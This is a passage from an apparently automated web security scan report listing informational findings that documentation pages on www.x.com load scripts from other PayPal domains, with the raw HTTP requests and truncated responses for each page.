Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335323b3130322c333335333b3130322c333332333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=134617 t=1313157240348745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.139. https://www.x.com/docs/DOC-3353

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3353

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3353 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=99945 t=1313157239993132
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.140. https://www.x.com/docs/DOC-3354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3354

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335343b3130322c333335353b3130322c333337313b3130322c333332333b3130322c333334353b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=125676 t=1313157239533114
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.141. https://www.x.com/docs/DOC-3355

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3355

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3355 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335353b3130322c333334353b3130322c333231323b3130322c333332333b3130322c333337313b3130322c333337333b3130322c333337323b3130322c333337343b3130322c333235313b3130322c333337353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=160248 t=1313157238946488
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.142. https://www.x.com/docs/DOC-3371

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3371

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3371 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=131293 t=1313157237278257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.143. https://www.x.com/docs/DOC-3372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3372

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337323b3130322c333337333b3130322c333337353b3130322c333235313b3130322c333337343b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=129449 t=1313157236932252
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.144. https://www.x.com/docs/DOC-3373

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3373

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3373 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=131465 t=1313157236591127
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.145. https://www.x.com/docs/DOC-3374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3374

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337343b3130322c333235313b3130322c333432363b3130322c333337353b3130322c333433313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=102916 t=1313157236205992
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.146. https://www.x.com/docs/DOC-3375

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3375

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3375 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337353b3130322c333432373b3130322c333434333b3130322c333433313b3130322c333432363b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b3130322c333631393b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=172605 t=1313157234881833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.147. https://www.x.com/docs/DOC-3426

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3426

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3426 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432363b3130322c333434343b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333432373b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=177923 t=1313157233753621
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.148. https://www.x.com/docs/DOC-3427

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3427

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3427 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=115565 t=1313157233228654
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.149. https://www.x.com/docs/DOC-3431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3431

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333433313b3130322c333434343b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333536323b3130322c333631393b3130322c333638383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=173915 t=1313157234152384
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.150. https://www.x.com/docs/DOC-3443

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3443

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3443 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434333b3130322c333631393b3130322c333638383b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=98914 t=1313157232773548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.151. https://www.x.com/docs/DOC-3444

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3444

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3444 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434343b3130322c333536313b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333536323b3130322c333834313b3130322c313631333b3130322c313035313b3130322c313033313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=100315 t=1313157231659068
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.152. https://www.x.com/docs/DOC-3491

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3491

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3491 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333439313b3130322c333631393b3130322c333434343b3130322c333638383b3130322c333536313b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313035313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=218057 t=1313157232304538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.153. https://www.x.com/docs/DOC-3561

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3561

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3561 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536313b3130322c333834313b3130322c333638383b3130322c333631393b3130322c333536323b3130322c313631333b3130322c333831323b3130322c313035313b3130322c313033313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=135641 t=1313157231234077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.154. https://www.x.com/docs/DOC-3562

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3562

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3562 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536323b3130322c333638383b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313035313b3130322c333631393b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=175892 t=1313157230683229
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.155. https://www.x.com/docs/DOC-3619

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3619

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3619 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
